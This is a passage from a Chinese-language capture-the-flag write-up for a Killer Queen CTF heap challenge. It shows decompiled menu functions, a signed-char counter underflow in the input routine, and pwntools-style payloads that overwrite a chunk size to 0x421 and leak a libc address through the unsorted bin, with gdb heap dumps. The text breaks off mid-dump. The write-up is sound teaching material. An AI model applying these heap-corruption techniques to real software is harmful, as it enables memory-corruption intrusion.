killer queen ctf
Posted Y0n1an
SEARCHING
先看一下ida的main函数
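/*
 * Entry point as decompiled by IDA.  The scraped listing had lost every
 * block brace; they are restored here so the control flow is readable.
 * No statement has been changed.
 *
 * Turns off stdio buffering, prints a banner, then dispatches menu choices
 * until option 4 is selected.  menu(), create(), display() and reset() are
 * other functions of the same binary (menu() is not shown on this page).
 */
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+Ch] [rbp-4h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("All my homies hate fufu's.");
  puts("You can use my program, but don't be fufu.\\n");
  while ( 1 )
  {
    v3 = menu();
    if ( v3 == 4 )                              // 4 = leave the loop and exit
      break;
    if ( v3 <= 4 )                              // anything above 4 is ignored and the menu is shown again
    {
      switch ( v3 )                             // values below 1 match no case and are ignored as well
      {
        case 3:
          reset();
          break;
        case 1:
          create();
          break;
        case 2:
          display();
          break;
      }
    }
  }
  puts("Bye.");
  _exit(0);
}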
看一下create函数:create函数先读入index,只有index = 0才会继续执行;它会先free之前的chunk0,然后读入size并分配一个新的chunk,最后用inbuf函数读入chunk的内容。注意size的检查条件 v1 <= 199 && v1 > 1000 永远不成立,所以实际上任意size都能通过检查
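/*
 * create(): frees whatever chnk[0] currently points to, allocates a new
 * chunk of a user-chosen size and fills it through inbuf().
 * (IDA output; the block braces lost in the scraped listing are restored,
 * the statements themselves are unchanged.)
 *
 * Only index 0 is accepted.  Returns the result of the final puts().
 *
 * Review notes, kept as comments because this is the challenge binary's
 * own logic and the write-up depends on it:
 *  - the size check below can never fire;
 *  - the malloc() result is used without a NULL check;
 *  - the new chunk is not cleared, so display() may print whatever bytes
 *    the allocator left in it after the user's input ends.
 */
int create()
{
  int v1; // [rsp+8h] [rbp-8h]
  int v2; // [rsp+Ch] [rbp-4h]

  puts("You now get to create a chunk.\\n");
  puts("Which index would you like to create a chunk on?");
  v2 = inidx();
  if ( v2 < 0 || v2 > 0 )                       // i.e. v2 != 0: a single slot only
    return puts("Invalid index.\\n");
  free(*((void **)&chnk + v2));                 // free(NULL) when the slot was cleared by reset()
  puts("What size chunk do you want?");
  v1 = inidx();
  // NOTE(review): no value is both <= 199 and > 1000, so this branch is dead
  // (CWE-570) and every size, including 0 and negative values, reaches
  // malloc().  The intended test was presumably
  // `v1 <= 199 || v1 > 1000` -- confirm against the challenge source.
  if ( v1 <= 199 && v1 > 1000 )
    return puts("Invalid size.\\n");
  *((_QWORD *)&chnk + v2) = malloc(v1);         // result is not checked for NULL
  puts("Input content.");
  // The size is handed to inbuf() as its byte limit; inbuf() counts with a
  // `char`, so any limit above 127 is not actually enforced there.
  inbuf(*((_QWORD *)&chnk + v2), (unsigned int)v1);
  return puts("Chunk created.\\n");
}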
用inbuf读入输入的content:inbuf函数会逐字节读入我们输入的字符,遇到'\n'结束,并在末尾写入一个null来终止我们的输入
这里就有个漏洞了:循环计数器i是char(byte)类型,取值范围是-128到127;当size大于127时,i在127之后会回绕成负数,写入位置就会落到chunk起始地址之前(下溢)
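/*
 * inbuf(a1, a2): reads bytes from stdin into the buffer at address a1 until
 * a newline is read or the counter reaches a2, then writes a terminating 0.
 * (IDA output; braces restored from the flattened listing.  The placement
 * of the terminating store after the loop follows the page's description
 * "terminated with a null" -- confirm against the binary.)
 *
 * Returns the result of puts(&s); `s` is a global not shown on this page.
 *
 * Root cause of the bug discussed on the page: the loop counter is a
 * `char`.  On this target char is signed (range -128..127, as the page
 * states), so for any a2 > 127 the comparison `a2 > i` stays true forever
 * and `++i` goes from 127 to -128.  From then on `i + a1` addresses memory
 * *before* the buffer: an out-of-bounds write below the allocation
 * (buffer underwrite, CWE-124), bounded only by where the newline arrives.
 *
 * Fix in real code: count with size_t (or at least int), stop at a2 - 1 so
 * the terminator fits, and stop on EOF.
 */
int __fastcall inbuf(__int64 a1, int a2)
{
  char i; // [rsp+1Fh] [rbp-1h]

  for ( i = 0; a2 > i; ++i )                    // 8-bit signed counter compared with a 32-bit limit
  {
    *(_BYTE *)(i + a1) = getc(stdin);           // EOF (-1) is not checked; it is stored as a data byte
    if ( *(_BYTE *)(i + a1) == 10 )             // 10 == '\n'
      break;
  }
  // Overwrites the newline, or -- when the loop ended on the count instead --
  // stores at a1[a2], one byte past the requested size.
  *(_BYTE *)(i + a1) = 0;
  return puts(&s);
}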
这是display函数,然后输出
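/*
 * display(): prints the contents of chnk[0] as a C string.
 * (IDA output; braces restored from the flattened listing, statements
 * unchanged.)
 *
 * Only index 0 is accepted.  Returns the result of the final puts().
 *
 * Review notes:
 *  - after reset() the slot holds 0, so puts() is called with a NULL
 *    pointer here;
 *  - puts() prints up to the first 0 byte, not up to the length the user
 *    typed.  create() allocates with malloc() and inbuf() terminates only
 *    the bytes it wrote, so stale allocator data that follows directly
 *    (with no 0 byte in between) is printed too.  Clearing the chunk on
 *    allocation or printing with an explicit length avoids that
 *    disclosure.
 */
int display()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("You now get to display a chunk.\\n");
  puts("Which index would you like to dispaly?");
  v1 = inidx();
  if ( v1 < 0 || v1 > 0 )                       // i.e. v1 != 0
    return puts("Invalid index.\\n");
  puts("Your chunk shows:");
  puts(*((const char **)&chnk + v1));           // no NULL check, no length bound
  return puts("\\nChunk displayed.\\n");
}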
reset把chnk[0]直接置0而不free它,这样下一次create里执行的就是free(NULL),可以防止这个chunk被free
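/*
 * reset(): clears the pointer stored in chnk[0].
 * (IDA output; braces restored from the flattened listing, statements
 * unchanged.)
 *
 * Only index 0 is accepted.  Returns the result of the final puts().
 *
 * Review note: the slot is zeroed without free(), so the chunk it pointed
 * to is leaked and stays allocated; the next create() then calls
 * free(NULL), which does nothing.  Code that means to release the chunk
 * should free() it before clearing the pointer.
 */
int reset()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("You now get to reset a chunk.\\n");
  puts("Which index would you like to reset?");
  v1 = inidx();
  if ( v1 < 0 || v1 > 0 )                       // i.e. v1 != 0
    return puts("Invalid index.\\n");
  chnk[v1] = 0LL;                               // pointer dropped, memory not released
  return puts("Chunk reset.\\n");
}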
思路就是:
创造一个size为0x420的chunk
free它
创造overlap去泄露libc
创造三个chunk,两个free一个已分配
EXPLOITATION
exp:
泄露libc
首先申请三个chunk,然后不管,反正已经分配了
create(0,0x10,b'aAA') <--- chunk D
create(0,0x40, b'VVV') <--- chunk E
create(0,0x90,"FFFFFF") <--- chunk F
通常如果要得到libc的地址会用unsorted bin:malloc一个足够大的chunk,free它的时候它最终会进入unsorted bin,libc的地址会被放进fd和bk中。问题是我们现在free大的chunk时,它周围没有其他chunk,top chunk会把它合并掉
所以我们的想法是去申请足够多的chunk,让它们加起来的size比0x408多,然后用下溢把第一个chunk的size改成0x421并且free掉它。这样在我们修改了size的fake chunk和top chunk之间就会有至少一个chunk,这样就不会合并
create(0,0x60,0x20*b'A') <----- chunk A. We will resize this one to 0x421
create(0,0x200,0x20*b'B') <---- chunk B. This one we will use to perform the underflow
create(0,0x70,0x70*b'C')
reset(0)
create(0,0x70,0x70*b'C')
reset(0)
create(0,0x70,0x70*b'G')
reset(0)
payload= b'R'*16
payload += p64(0x420)
payload += p64(0x61)
payload += p64(0)
payload += p64(0)
create(0,0x70,payload) <------- chunk C. Inside this one we create a fake chunk to pass the check for freeing into unsorted bin
reset(0)
payload = b'B' * 0x7e <------ payload to overflow char
payload += b"\\x00" * 10 <-------- some padding so the next line lands on the size of chunk A
payload += p64(0x421) <----- this will overwrite the size of chunk A to 0x421 using the underflow
create(0,0x200,payload) <---- chunk B that is returned from tcache
chunk B到chunk C之间的这些chunk的作用是:当A的size被改写并且A被free的时候,A + 0x420这个地址正好指向我们控制的fake chunk
0x56257ccda3a0: 0x0000000000000000 0x0000000000000071 <--- chunk A
0x56257ccda3b0: 0x0000000000000000 0x000056257ccda010
0x56257ccda3c0: 0x4141414141414141 0x4141414141414141
0x56257ccda3d0: 0x0000000000000000 0x0000000000000000
0x56257ccda3e0: 0x0000000000000000 0x0000000000000000
0x56257ccda3f0: 0x0000000000000000 0x0000000000000000
0x56257ccda400: 0x0000000000000000 0x0000000000000000
0x56257ccda410: 0x0000000000000000 0x0000000000000211 <--- chunk B
0x56257ccda420: 0x4242424242424242 0x4242424242424242
0x56257ccda430: 0x4242424242424242 0x4242424242424242
0x56257ccda440: 0x0000000000000000 0x0000000000000000
0x56257ccda450: 0x0000000000000000 0x0000000000000000
0x56257ccda460: 0x0000000000000000 0x0000000000000000
0x56257ccda470: 0x0000000000000000 0x0000000000000000
0x56257ccda480: 0x0000000000000000 0x0000000000000000
0x56257ccda490: 0x0000000000000000 0x0000000000000000
0x56257ccda4a0: 0x0000000000000000 0x0000000000000000
0x56257ccda620: 0x0000000000000000 0x0000000000000081
0x56257ccda630: 0x4343434343434343 0x4343434343434343
0x56257ccda640: 0x4343434343434343 0x4343434343434343
0x56257ccda650: 0x4343434343434343 0x4343434343434343
0x56257ccda660: 0x4343434343434343 0x4343434343434343
0x56257ccda670: 0x4343434343434343 0x4343434343434343
0x56257ccda680: 0x4343434343434343 0x4343434343434343
0x56257ccda690: 0x4343434343434343 0x4343434343434343
0x56257ccda6a0: 0x0000000000000000 0x0000000000000081
0x56257ccda6b0: 0x4343434343434343 0x4343434343434343
0x56257ccda6c0: 0x4343434343434343 0x4343434343434343
0x56257ccda6d0: 0x4343434343434343 0x4343434343434343
0x56257ccda6e0: 0x4343434343434343 0x4343434343434343
0x56257ccda6f0: 0x4343434343434343 0x4343434343434343
0x56257ccda700: 0x4343434343434343 0x4343434343434343
0x56257ccda710: 0x4343434343434343 0x4343434343434343
0x56257ccda720: 0x0000000000000000 0x0000000000000081
0x56257ccda730: 0x4747474747474747 0x4747474747474747
0x56257ccda740: 0x4747474747474747 0x4747474747474747
0x56257ccda750: 0x4747474747474747 0x4747474747474747
0x56257ccda760: 0x4747474747474747 0x4747474747474747
0x56257ccda770: 0x4747474747474747 0x4747474747474747
0x56257ccda780: 0x4747474747474747 0x4747474747474747
0x56257ccda790: 0x4747474747474747 0x4747474747474747
0x56257ccda7a0: 0x0000000000000000 0x0000000000000081
0x56257ccda7b0: 0x5252525252525252 0x5252525252525252
0x56257ccda7c0: 0x0000000000000420 0x0000000000000061 <--- fake chunk to pass the check
0x56257ccda7d0: 0x0000000000000000 0x0000000000000000
0x56257ccda7e0: 0x0000000000000000 0x0000000000000000
0x56257ccda7f0: 0x0000000000000000 0x0000000000000000
0x56257ccda800: 0x0000000000000000 0x0000000000000000
0x56257ccda810: 0x0000000000000000 0x0000000000000000
0x56257ccda820: 0x0000000000000000 0x00000000000207e1 <--- top chunk
修改后
0x56257ccda3a0: 0x0000000000000000 0x0000000000000421 <--- chunk A that we resized using the underflow
0x56257ccda3b0: 0x0000000000000000 0x000056257ccda010
0x56257ccda3c0: 0x4141414141414141 0x4141414141414141
0x56257ccda3d0: 0x0000000000000000 0x0000000000000000
0x56257ccda3e0: 0x0000000000000000 0x0000000000000000
0x56257ccda3f0: 0x0000000000000000 0x0000000000000000
0x56257ccda400: 0x0000000000000000 0x0000000000000000
0x56257ccda410: 0x0000000000000000 0x0000000000000211
0x56257ccda420: 0x4242424242424242 0x4242424242424242
0x56257ccda430: 0x4242424242424242 0x4242424242424242
0x56257ccda440: 0x4242424242424242 0x4242424242424242
0x56257ccda450: 0x4242424242424242 0x4242424242424242
0x56257ccda460: 0x4242424242424242 0x4242424242424242
0x56257ccda470: 0x4242424242424242 0x4242424242424242
0x56257ccda480: 0x4242424242424242 0x4242424242424242
0x56257ccda490: 0x4242424242424242 0x0000424242424242
0x56257ccda4a0: 0x0000000000000000 0x0000000000000000
0x56257ccda4b0: 0x0000000000000000 0x0000000000000000
0x56257ccda4c0: 0x0000000000000000 0x0000000000000000
0x56257ccda4d0: 0x0000000000000000 0x0000000000000000
0x56257ccda4e0: 0x0000000000000000 0x0000000000000000
0x56257ccda4f0: 0x0000000000000000 0x0000000000000000
0x56257ccda500: 0x0000000000000000 0x0000000000000000
0x56257ccda510: 0x0000000000000000 0x0000000000000000
0x56257ccda520: 0x0000000000000000 0x0000000000000000
0x56257ccda530: 0x0000000000000000 0x0000000000000000
0x56257ccda540: 0x0000000000000000 0x0000000000000000
0x56257ccda550: 0x0000000000000000 0x0000000000000000
0x56257ccda560: 0x0000000000000000 0x0000000000000000
0x56257ccda570: 0x0000000000000000 0x0000000000000000
0x56257ccda580: 0x0000000000000000 0x0000000000000000
0x56257ccda590: 0x0000000000000000 0x0000000000000000
0x56257ccda5a0: 0x0000000000000000 0x0000000000000000
0x56257ccda5b0: 0x0000000000000000 0x0000000000000000
0x56257ccda5c0: 0x0000000000000000 0x0000000000000000
0x56257ccda5d0: 0x0000000000000000 0x0000000000000000
0x56257ccda5e0: 0x0000000000000000 0x0000000000000000
0x56257ccda5f0: 0x0000000000000000 0x0000000000000000
0x56257ccda600: 0x0000000000000000 0x0000000000000000
0x56257ccda610: 0x0000000000000000 0x0000000000000000
0x56257ccda620: 0x0000000000000000 0x0000000000000081
0x56257ccda630: 0x4343434343434343 0x4343434343434343
0x56257ccda640: 0x4343434343434343 0x4343434343434343
0x56257ccda650: 0x4343434343434343 0x4343434343434343
0x56257ccda660: 0x4343434343434343 0x4343434343434343
0x56257ccda670: 0x4343434343434343 0x4343434343434343
0x56257ccda680: 0x4343434343434343 0x4343434343434343
0x56257ccda690: 0x4343434343434343 0x4343434343434343
0x56257ccda6a0: 0x0000000000000000 0x0000000000000081
0x56257ccda6b0: 0x4343434343434343 0x4343434343434343
0x56257ccda6c0: 0x4343434343434343 0x4343434343434343
0x56257ccda6d0: 0x4343434343434343 0x4343434343434343
0x56257ccda6e0: 0x4343434343434343 0x4343434343434343
0x56257ccda6f0: 0x4343434343434343 0x4343434343434343
0x56257ccda700: 0x4343434343434343 0x4343434343434343
0x56257ccda710: 0x4343434343434343 0x4343434343434343
0x56257ccda720: 0x0000000000000000 0x0000000000000081
0x56257ccda730: 0x4747474747474747 0x4747474747474747
0x56257ccda740: 0x4747474747474747 0x4747474747474747
0x56257ccda750: 0x4747474747474747 0x4747474747474747
0x56257ccda760: 0x4747474747474747 0x4747474747474747
0x56257ccda770: 0x4747474747474747 0x4747474747474747
0x56257ccda780: 0x4747474747474747 0x4747474747474747
0x56257ccda790: 0x4747474747474747 0x4747474747474747
0x56257ccda7a0: 0x0000000000000000 0x0000000000000081
0x56257ccda7b0: 0x5252525252525252 0x5252525252525252
0x56257ccda7c0: 0x0000000000000420 0x0000000000000061
0x56257ccda7d0: 0x0000000000000000 0x0000000000000000
0x56257ccda7e0: 0x0000000000000000 0x0000000000000000
0x56257ccda7f0: 0x0000000000000000 0x0000000000000000
0x56257ccda800: 0x0000000000000000 0x0000000000000000
0x56257ccda810: 0x0000000000000000 0x0000000000000000
0x56257ccda820: 0x0000000000000000 0x00000000000207e1
现在可以有0x421大小的chunk,我们可以free它,这样free了chunkA相当于free chunkB,所以在我们free之前,我们要malloc一下
create(0,0x60,0x8*b'F')
create(0,0xe0,b'WWWWWWWW')
这样就会把0x60的chunkA还回来,即使它现在是0x421,因为我们free的时候是0x70而且它存在tcache[0x70]中
然后申请0xe0
这样,内存分布为
0x56257ccda3a0: 0x0000000000000000 0x00000000000000f1 <--- the new chunk size 0xe0 we just allocated
0x56257ccda3b0: 0x5757575757575757 0x00007f6a2f4adf00
0x56257ccda3c0: 0x000056257ccda3a0 0x000056257ccda3a0
0x56257ccda3d0: 0x0000000000000000 0x0000000000000000
0x56257ccda3e0: 0x0000000000000000 0x0000000000000000
0x56257ccda3f0: 0x0000000000000000 0x0000000000000000
0x56257ccda400: 0x0000000000000000 0x0000000000000000
0x56257ccda410: 0x0000000000000000 0x0000000000000211 <--- chunk B - still freed
0x56257ccda420: 0x0000000000000000 0x000056257ccda010
0x56257ccda430: 0x4242424242424242 0x4242424242424242
0x56257ccda440: 0x4242424242424242 0x4242424242424242
0x56257ccda450: 0x4242424242424242 0x4242424242424242
0x56257ccda460: 0x4242424242424242 0x4242424242424242
0x56257ccda470: 0x4242424242424242 0x4242424242424242
0x56257ccda480: 0x4242424242424242 0x4242424242424242
0x56257ccda490: 0x4242424242424242 0x0000000000000331 <--- chunk A that shrunk
0x56257ccda4a0: 0x00007f6a2f4adbe0 0x00007f6a2f4adbe0 <--- libc address we are trying to leak
0x56257ccda4b0: 0x0000000000000000 0x0000000000000000
0x56257ccda4c0: 0x0000000000000000 0x0000000000000000
0x56257ccda4d0: 0x0000000000000000 0x0000000000000000
0x56257ccda4e0: 0x0000000000000000 0x0000000000000000
0x56257ccda4f0: 0x0000000000000000 0x0000000000000000
0x56257ccda500: 0x0000000000000000 0x0000000000000000
0x56257ccda510: 0x0000000000000000 0x0000000000000000
0x56257ccda520: 0x0000000000000000 0x0000000000000000
0x56257ccda530: 0x0000000000000000 0x0000000000000000
0x56257ccda540: 0x0000000000000000 0x0000000000000000
0x56257ccda550: 0x0000000000000000 0x0000000000000000
0x56257ccda560: 0x0000000000000000 0x0000000000000000
0x56257ccda570: 0x0000000000000000 0x0000000000000000
0x56257ccda580: 0x0000000000000000 0x0000000000000000
0x56257ccda590: 0x0000000000000000 0x0000000000000000
0x56257ccda5a0: 0x0000000000000000 0x0000000000000000
0x56257ccda5b0: 0x0000000000000000 0x0000000000000000
0x56257ccda5c0: 0x0000000000000000 0x0000000000000000
0x56257ccda5d0: 0x0000000000000000 0x0000000000000000
0x56257ccda5e0: 0x0000000000000000 0x0000000000000000
0x56257ccda5f0: 0x0000000000000000 0x0000000000000000
0x56257ccda600: 0x0000000000000000 0x0000000000000000
0x56257ccda610: 0x0000000000000000 0x0000000000000000
0x56257ccda620: 0x0000000000000000 0x0000000000000081
0x56257ccda630: 0x4343434343434343 0x4343434343434343
0x56257ccda640: 0x4343434343434343 0x4343434343434343
0x56257ccda650: 0x4343434343434343 0x4343434343434343
0x56257ccda660: 0x4343434343434343 0x4343434343434343
0x56257ccda670: 0x4343434343434343 0x4343434343434343
0x56257ccda680: 0x4343434343434343 0x4343434343434343
0x56257ccda690: 0x4343434343434343 0x4343434343434343
0x56257ccda6a0: 0x0000000000000000 0x0000000000000081
0x56257ccda6b0: 0x4343434343434343 0x4343434343434343
0x56257ccda6c0: 0x4343434343434343 0x4343434343434343
0x56257ccda6d0: 0x4343434343434343 0x4343434343434343
0x56257ccda6e0: 0x4343434343434343 0x4343434343434343
0x56257ccda6f0: 0x4343434343434343 0x4343434343434343
0x56257ccda700: 0x4343434343434343 0x4343434343434343
0x56257ccda710: 0x4343434343434343 0x4343434343434343
0x56257ccda720: 0x0000000000000000 0x0000000000000081
0x56257ccda730